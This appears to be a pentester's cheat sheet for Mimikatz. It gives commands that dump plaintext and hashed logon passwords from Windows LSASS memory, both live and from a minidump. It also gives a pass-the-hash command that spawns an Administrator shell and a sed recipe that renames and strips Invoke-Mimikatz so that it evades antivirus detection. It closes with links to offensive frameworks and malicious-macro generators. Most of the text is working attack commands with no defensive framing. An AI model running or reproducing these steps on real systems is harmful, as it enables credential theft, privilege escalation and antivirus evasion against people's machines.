https://github.com/gentilkiwi/mimikatz
https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
TLDR:
1.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
extract passwds
1mimikatz_command -f sekurlsa::logonPasswords full
2mimikatz_command -f sekurlsa::wdigest
pass the hash (on the left hand side)
1sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
mimidawgz (avoid AV detection)
1mv Invoke-Mimikatz.ps1 Invoke-MimiDawgz.ps1
2
3sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidawgz/g' Invoke-MimiDawgz.ps1
4sed -i -e '/<#/,/#>/c\\' Invoke-MimiDawgz.ps1
5
6sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-MimiDawgz.ps1
7
8sed -i -e 's/DumpCreds/DumpCred/g' Invoke-MimiDawgz.ps1
9
10sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-MimiDawgz.ps1
11
12sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g'
13Invoke-MimiDawgz.ps1
14
15sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions
16\$Win32Functions #\-/g" Invoke-MimiDawgz.ps1
Ref: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
https://github.com/PowerShellMafia/PowerSploit
Extract passwd from Windows memory dump
1Get-Process lsass | Out-Minidump`
2
3mimikatz “sekurlsa::minidump lsass.dmp”
4
5mimikatz # sekurlsa::logonPasswords
https://github.com/EmpireProject/Empire
http://threatexpress.com/2017/05/invoke-hostenum/
http://threatexpress.com/2018/01/hostenum-updates-usage/
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/leechristensen/UnmanagedPowerShell
https://github.com/trustedsec/unicorn
https://github.com/peewpw/Invoke-PSImage
https://github.com/curi0usJack/luckystrike
https://github.com/enigma0x3/Generate-Macro
https://github.com/infosecn1nja/MaliciousMacroMSBuild
https://github.com/fireeye/SessionGopher
https://github.com/samratashok/nishang
https://github.com/NetSPI/PowerUpSQL
https://github.com/JavelinNetworks/HoneypotBuster